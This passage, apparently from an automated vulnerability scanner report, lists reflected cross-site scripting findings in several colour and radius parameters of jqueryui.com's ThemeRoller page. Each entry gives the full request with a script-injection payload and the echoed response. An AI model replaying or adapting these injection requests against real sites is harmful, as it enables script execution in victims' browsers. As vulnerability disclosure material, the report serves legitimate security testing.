90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:47 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="borderColorError" id="borderColorError" class="hex" value="ffb73d790f4\\\"><script>alert(1)</script>345bd3673c8" size="6" />
...[SNIP]...

1.152. http://jqueryui.com/themeroller/_rollyourown.php [borderColorHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f74c"><script>alert(1)</script>53cf914cae5 was submitted in the borderColorHeader parameter. This input was echoed as 8f74c\\\"><script>alert(1)</script>53cf914cae5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=4944378f74c"><script>alert(1)</script>53cf914cae5&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:24 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="borderColorHeader" id="borderColorHeader" class="hex" value="4944378f74c\\\"><script>alert(1)</script>53cf914cae5" size="6" />
...[SNIP]...

1.153. http://jqueryui.com/themeroller/_rollyourown.php [borderColorHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bd56"><script>alert(1)</script>2b342c2c976 was submitted in the borderColorHighlight parameter. This input was echoed as 2bd56\\\"><script>alert(1)</script>2b342c2c976 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb4202bd56"><script>alert(1)</script>2b342c2c976&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:43 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="borderColorHighlight" id="borderColorHighlight" class="hex" value="eeb4202bd56\\\"><script>alert(1)</script>2b342c2c976" size="6" />
...[SNIP]...

1.154. http://jqueryui.com/themeroller/_rollyourown.php [borderColorHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fd51"><script>alert(1)</script>9aa54ecab94 was submitted in the borderColorHover parameter. This input was echoed as 1fd51\\\"><script>alert(1)</script>9aa54ecab94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b131fd51"><script>alert(1)</script>9aa54ecab94&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:34 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="borderColorHover" id="borderColorHover" class="hex" value="a45b131fd51\\\"><script>alert(1)</script>9aa54ecab94" size="6" />
...[SNIP]...

1.155. http://jqueryui.com/themeroller/_rollyourown.php [cornerRadius parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload affe9"><script>alert(1)</script>0f2a8359a6f was submitted in the cornerRadius parameter. This input was echoed as affe9\\\"><script>alert(1)</script>0f2a8359a6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8pxaffe9"><script>alert(1)</script>0f2a8359a6f&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:21 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8pxaffe9%22%3E%3Cscri
...[SNIP]...
<input type="text" value="8pxaffe9\\\"><script>alert(1)</script>0f2a8359a6f" name="cornerRadius" id="cornerRadius" class="cornerRadius" />
...[SNIP]...

1.156. http://jqueryui.com/themeroller/_rollyourown.php [cornerRadiusShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23ad0"><script>alert(1)</script>df5e393dd08 was submitted in the cornerRadiusShadow parameter. This input was echoed as 23ad0\\\"><script>alert(1)</script>df5e393dd08 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px23ad0"><script>alert(1)</script>df5e393dd08 HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:57 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" value="8px23ad0\\\"><script>alert(1)</script>df5e393dd08" name="cornerRadiusShadow" id="cornerRadiusShadow" class="cornerRadius" />
...[SNIP]...

1.157. http://jqueryui.com/themeroller/_rollyourown.php [fcActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 549cc"><script>alert(1)</script>a2548245a2c was submitted in the fcActive parameter. This input was echoed as 549cc\\\"><script>alert(1)</script>a2548245a2c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7549cc"><script>alert(1)</script>a2548245a2c&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
